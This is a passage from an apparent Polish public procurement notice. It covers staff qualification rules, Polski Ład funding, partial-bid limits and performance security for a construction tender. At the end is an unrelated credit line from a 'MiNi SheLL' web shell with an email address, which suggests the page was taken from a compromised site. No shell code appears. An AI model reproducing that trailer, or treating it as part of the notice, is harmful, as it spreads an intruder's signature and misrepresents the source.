bez ograniczeń lub<br/>odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów, zgodnie z wymogami ustawy Prawo budowlane<br/>oraz ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego;<br/>wraz z informacjami na temat: danych personalnych (imię i nazwisko) osób skierowanych przez<br/>Wykonawcę do realizacji zamówienia, ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami, sporządzonego wg wzoru stanowiącego - załącznik nr 5 do SWZ.<br/>2. Inwestycja dofinansowana ze środków Rządowego Funduszu Polski Ład: Program Inwestycji<br/>Strategicznych.<br/>3. Zamawiający dopuszcza składanie ofert częściowych, przy czym w przypadku złożenia oferty<br/>na Zadanie 1 i/lub na Zadanie 2 wyklucza się możliwość złożenia oferty na zadanie 3 i odwrotnie.<br/>4.Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w przypadku<br/>zadania 1 i zadania 2.

Creat By MiNi SheLL
Email: jattceo@gmail.com